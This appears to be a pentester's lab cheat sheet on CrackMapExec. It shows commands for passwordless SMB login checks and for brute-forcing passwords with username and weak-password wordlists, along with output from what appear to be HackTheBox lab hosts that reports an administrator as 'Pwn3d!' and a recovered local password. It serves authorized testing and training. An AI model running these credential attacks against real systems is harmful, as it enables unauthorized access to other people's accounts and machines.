CRACKMAPEXEC (SMB, ETC)
DISPLAY HELP
root@oco:~$ crackmapexec {protocol} -h
PASSWORDLESS SMB MISCONFIGURATION
root@oco:~$ crackmapexec smb 10.129.95.200 -u top-usernames-shortlist.txt -p "" -t 1024
SMB 10.129.95.200 445 TACTICS [*] Windows 10 / Server 2019 Build 17763 x64 (name:TACTICS) (domain:Tactics) (signing:False) (SMBv1:False)
SMB 10.129.95.200 445 TACTICS [-] Tactics\root: STATUS_LOGON_FAILURE
SMB 10.129.95.200 445 TACTICS [-] Tactics\admin: STATUS_LOGON_FAILURE
SMB 10.129.95.200 445 TACTICS [-] Tactics\test: STATUS_LOGON_FAILURE
SMB 10.129.95.200 445 TACTICS [-] Tactics\guest: STATUS_ACCOUNT_DISABLED
SMB 10.129.95.200 445 TACTICS [-] Tactics\info: STATUS_LOGON_FAILURE
SMB 10.129.95.200 445 TACTICS [-] Tactics\adm: STATUS_LOGON_FAILURE
SMB 10.129.95.200 445 TACTICS [-] Tactics\mysql: STATUS_LOGON_FAILURE
SMB 10.129.95.200 445 TACTICS [-] Tactics\user: STATUS_LOGON_FAILURE
SMB 10.129.95.200 445 TACTICS [+] Tactics\administrator: (Pwn3d!)
* default threads is 256
- crackmapexec smb -hBRUTE FORCE
#unknown username
root@oco:~$ crackmapexec smb 10.129.95.200 -u top-usernames-shortlist.txt -p 500-worst-passwords.txt
#known username
root@htb:~$ crackmapexec smb 10.129.150.91 -u {username} -p 500-worst-passwords.txt -d .
SMB 10.129.150.91 445 GS-SVCSCAN [*] Windows 6.1 Build 0 (name:GS-SVCSCAN) (domain:) (signing:False) (SMBv1:False)
SMB 10.129.150.91 445 GS-SVCSCAN [+] .\bob:Welcome1
* -d specifies the domain name to use during authentication
- the -d MUST be specified else CME will to guess the domain or uses the username as-is and the correct password won't be found
- {-d .} states that the user is a local
- alternate usage instead of {-d .} is --local-auth
-crackmapexec smb 10.129.150.91 -u bob -p test.txt --local-authLast updated